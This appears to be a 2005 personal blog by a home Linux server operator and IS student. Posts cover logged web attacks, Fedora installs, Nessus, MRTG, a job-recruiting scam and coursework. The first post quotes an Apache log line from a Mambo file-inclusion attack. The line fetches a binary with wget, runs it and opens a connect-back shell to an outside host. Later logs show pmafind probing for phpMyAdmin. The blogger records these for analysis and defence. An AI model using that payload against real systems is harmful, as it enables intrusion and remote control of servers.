Script Kiddies attack my Linux/Apache box

I am seeing attacks on popular open-source software that runs on linux, e.g.

129.27.140.4 - - [29/Nov/2005:23:00:48 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST
[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://148.81.141.12/cmd.gif?&cmd=cd%20/tmp;wget%20
131.155.98.128/cback;chmod%20744%20cback;./cback%20
194.112.220.37%208080;echo%20YYY;echo| 
HTTP/1.1" 404 293 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)"

(I have broken the line up to fit. It's one entry, or request, from my Apache 2.0 log file. It's a Fedora Core 4 install, mostly default.)

These are slightly more complex attacks, and they show the difficulty of tracking down your attacker. The requester, 129.27.140.4 tracks here: optikom2.inw.tu-graz.ac.at, -- the Graz University of Technology in Austria. But the request is calling a script from here: lilo.pjwstk.edu.pl, the POLSKO-JAPONSKA WYZSZA SZKOLA TECHNIK KOMPUTEROWYCH in Poland. It uses more code from here: pc01.irce.tue.nl , someone's computer in the Netherlands. Finally, it looks like this server gets notified: 194.112.220.37: www.lbsschrems.at, WVNET Information und Kommunikation GmbH, somone's server in Austria. That server is running phpGroupWare, and has probably already been compromised and is now being used to compromise other machines. You could check for bugs in phpGroupWare, but their server's down.

The code here, http://131.155.98.128/cback, appears to be something in C that requires some include files. The initial script, here:
http://148.81.141.12/cmd.gif is a defacement script. Note that it doesn't open in Netscape -- just IE.

<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originais e por favor, entre em contato comigo... ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script, n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!! -->

At least our script writer left us his email address. He just wrote the code, of course, he's not the one trying to use it to deface a site. Right. There were additional lines in my Apache log file that showed attacks against other applications (not installed on my box): wordpress, phpgroupare, drupal and awstats. What weakness do these applications have in common? Xml-rpc on php.

It looks like Apache needs a tool similar to Windows/IIS's urlscan, which prevents attacks like these from getting to the webserver in the first place. These attacks are increasingly common, but there's no newspaper headlines, as was the case with attacks that took advantage of Microsoft vulnerabilities. These don't attack a single product, but holes in applications that are built on the ability to run things at the command line from a web request. It makes for great functionality and weak security.

Weak web applications may mean your firewall is really just a router for port 80 traffic.

A New Attack

Just when I was running out of memory to run my new photo gallery (Gallery 2),
I checked my log files to see what was causing some issues for me. It
turns out that Gallery2 and SELinux do not get along so well, but if
you edit your policy files, it can be made to work.



The new attack:

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /phpmyadmin/main.php HTTP/1.0" 404 296 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:41 -0500] "GET /PMA/main.php HTTP/1.0" 404 289 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /admin/main.php HTTP/1.0" 404 291 "-" "pmafind"


195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /mysql/main.php HTTP/1.0" 404 291 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /dbadmin/main.php HTTP/1.0" 404 293 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:42 -0500] "GET /db/main.php HTTP/1.0" 404 288 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 300 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/pma/main.php HTTP/1.0" 404 295 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/phpmyadmin/main.php HTTP/1.0" 404 302 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:43 -0500] "GET /admin/mysql/main.php HTTP/1.0" 404 297 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /mysql-admin/main.php HTTP/1.0" 404 297 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpmyadmin2/main.php HTTP/1.0" 404 297 "-" "pmafind"


195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 302 "-" "pmafind"

195.6.199.220 - - [28/Nov/2005:20:06:44 -0500] "GET /phpMyAdmin-2.2.6/main.php HTTP/1.0" 404 302 "-" "pmafind"



Apparently, there's a new tool out called "pmafind" looking for
phpmyadmin installs. I hadn't seen this one before. I guess enough
people have phpmyadmin installed in some unprotected directory to make
this worthwhile.



More attacks to come...

Red Hat vs. Mandrake

I grew tired of updating every package that came with Mandrake. The
most frustrating part was not finding what I needed to install, or
installing it but then configure didn't find it.




I re-downloaded Fedora Core 4 in the DVD image, burned it on the Mac.
Macs can open, create and burn ISO images using the standard Disk Tools
utility. I checked the sha1sum on the Linux box that was the FTP
staging area, because OS X doesn't seem to have a sha1sum utility, and
I didn't feel like spending time downloading, configuring and
installing one. CuteFTP balked at downloading a 2.6 GB file, too,
insisting that there wasn't space on my hard disk for it, even though
there was plenty of space. Once again, Linux command line to the rescue.




Red Hat is now installed on my antique Inspiron 7500, and it's not
perfect yet -- I'm still working on the display. But much more software
works without endless downloads configure-make-make install cycles....

Nessus: Security Scanning on Linux and Windows

There are some great tools available for Linux. Unfortunately, a lot of people don't use them for a variety of reasons. They don't understand Linux, and there's no standard interface on Linux, except for the über-powerful command line. (I'm still annoyed that most distributions set the default boot to the GUI.)

Nessus is one of those tools. It installs easily from the command line and it has a friendly setup script. Once you complete it, you can start the Nessus server on your Linux box. Someone has even written a friendly Windows client for Nessus, so you can control your scans from Windows.

What's the point? Nessus is a powerful security scanner/vulnerability finder that probably matches most of what's on the market. It stores results to a database (or databases), has a diff feature so you can easily track changes over time, and has a great number of options. It has nearly 10,000 plugins to run platform-specific attacks, and it does a good job of OS fingerprinting.

So I continue experimenting with Nessus, of course, on my own systems. I can have a Nessus scan against my firewall open in one window and I can watch my firewall logs in another. (Remote syslog is cool. Who knew that even cheap routers can log to syslog?)

Competing products have sexier interfaces and reports, but they cost a lot more.

MRTG, Linksys, Linux and Apache

I have put my Linux box to good use, installing MRTG and monitoring the bandwidth usage of my router. It turned out to be a little less simple than I thought, and I also bricked my old Linksys router. The Linksys BEFVP41 v.1 had SNMP and access log sending. Its first replacement, the BEFVP41 v.2 has access log sending but no SNMP. Thus I'm up to a Netopia R9100 that was lying around, which has SNMP, but remote syslog for router activity only.

I also bought a nice new Linksys WRT54GS v.3, which I have modded with a couple of different custom firmware developments. So far, the DD-WRT has some stability issues, so I'm still trying to choose.

What I really want is a complete access log that I can check for patterns. I want to be able to see all the traffic hitting my external interface. Do I really have to buy something like a Watchguard X5 to do this?

I also figured out how to do remote syslog after some vexation. There are actually two syslog configuration files, one in /etc and the other in /etc/sysconfig. (The man pages fail to mention the difference...) With the localx config in /etc and the -r option in /etc/sysconfig, my router (Netopia R9100) now logs all firewall violations to /var/log/router.log . Sweet. Now I just need something to parse it, although it's interesting to just keep a tail -f open.

Progress

Back in the old days, (1990s) I had ISDN at home. It was the fastest bandwidth available, and it afforded me voice and fax and data all in one interface. (ISDN-BRI, with two B channels and one D channel for signalling, if you get technical.) Billing was awful. I paid two cents a minute per B channel during peak hours, and it took some tweaking to get it down. (Windows really does broadcast every eleven minutes, and that would bring up the data at two cents a minute.) Needless to say, I stayed up late at night to do large downloads.

I have gone through DSL and now I have cable at about 5 Megabits per second. I just downloaded Fedora Core 4 (Redhat's free testbed) and installed it on an old P3 system I have here. Federal Core 4 is 4 CDs, about 650 MB each. I had some trouble with the media checking, and the SHA-1 checks didn't check out, so I had to download them all again.

All in all, I think I downloaded over 5 GB of data over the past 24 hours. Back in 1998, this would have been unthinkable. Back then, you had to order the CDs, wait for them to arrive, and then install it. And installing Redhat 5.x, you had to know the IRQs and DMAs and which chip set your NIC had (I started hoarding DEC Tulip cards). Today, Redhat (and the other Linuxes) load up all my hardware automatically. I don't have to know anything about my hardware.

And the new linuxes have nice GUIs that launch by default. To log in at runlevel 3, you need to start tweak inittab. And VI has now been replaced with VIM.

All I wanted was a command line interface like I'm used to.

CS vs. IS vs. IT

Computer Science and Information Systems are fundamentally different. In Information Systems, we might be able to use a more efficient compression algorithm, but unless the business rules call for it, we don't care. IS is about management of business rules and processes, although some CS folks seem to think it's just a survey of computer science for people who can't do calculus. We actually end up doing calculus for project management to predict what our chances are of finishing a project on time. IS also covers organizational behavior.

I come from an Information Technology background. When I started talking about IT in an IS context, my professors quickly corrected me. Technology -- whatever it is -- should support business processes. Where technology can transform an organization is where IS fits in. Servers, routers, switches, and software are what you build IS implementations on. IS covers transaction support systems, management information systems, and decision support systems. IS is part of the business school; CS is part of the engineering school. IT is taught at vo-tech schools.

IS is why restaurants serve hamburgers with a pound of beef. By analyzing restaurant ordering system logs, it became apparent that giant burgers bring customers in and make more money for the restaurant chain. Computer scientists can write the DBMS that holds the data, and IT people can manage the hardware and the software, but the IS people design the system.

So when people start lumping everything together, IT/IS/CS, they are covering a lot of different areas. Some even talk about a degree in IT, which doesn't exist, at least not until Microsoft creates its own university. (Which McDonald's has.)

All Classes will be on Wednesdays this Spring.

I just registered for the spring semester. All classes I need are on Wednesday evening, so I will be in class from 6pm until 10pm.
Wednesday:
Computerized Decision Systems - MGT 226 10
Database Systems - MGT 284 10
Monday: (my elective)
Topics in Higher Level Languages (Java) - MGT 283 10
I wasn't planning on a higher level language this spring, much less Java, but the professor has her own book on object oriented programming using Java, so it's hard to resist. Maybe I'll learn something.

All the other electives I wanted to take were also on Wednesday evening.

Job Fraud

With so many people using the Internet to look for new and better jobs, a new Internet scam has begun. I keep getting emails like this:

Your resume came to us through one of our partners and we would like to set an appointment to meet with you. Albert & Alexander Associates helps direct senior executives and managers to the best jobs in the Washington DC area. We steward our clients careers, maximizing their earning potential and job satisfaction.
If you are interested in learning more, please visit  (link) and complete our assessment. Someone will contact you shortly if we feel we can be of assistance.
Best Regards,
Albert & Alexander Associates

This is different from other, legitimate job emails from comanies and recruiters I would love to work with. These guys are like Bernard Haldane, who have been caught ripping job seekers off with the promise of uncovering the "secret job market." The saddest parts are the misspellings in the subject line: "We recieved your resume" and how the return address ( washingtoncareers@gmail.com ) doesn't work.So Monster-résumé-posters beware, there is a new way for scam artists to find you. What makes this suspicious?

•  There's no specific job listed.


• No pre-screen questions: US citizen, clearance, how much $ you want.


• The "assessment" requires your salary from every job on your résumé.



• Lack of specifics.


• Lack of contactibility of recruiters. The real recruiters I've spoken with are efficient, polite, and quick to respond.


• Return email is a gmail address, even though this outfit has its own domain.

Object Oriented Development

Everybody keeps asking me what they teach in Information Systems grad school, so I'm going to start discussing it here.

Basically, we're still learning System Development Lifecycle, in several different forms. Structured, Rapid Application Development, Extreme (Xtreme!) Programming, and finally Object-Oriented.

Object Oriented is not just a higher-level language any more. It's a whole development method with its own techniques, tools and diagrams. These diagrams, more or less, replace dataflow diagrams and entity relationship diagrams, although I think every database should have a good ERD.

Some of my classmates were still confused and/or think OO development is a fad. It slowed class up a little. A fair misunderstanding is the database side. What's an object oriented database? Well, we're not really sure yet. OO programming still uses databases -- traditional databases. From the diagrams and textbook, this wasn't clear, leading to the question, "Where does the data go if you turn the system off?"

It's still there, in a database, just like structured approach.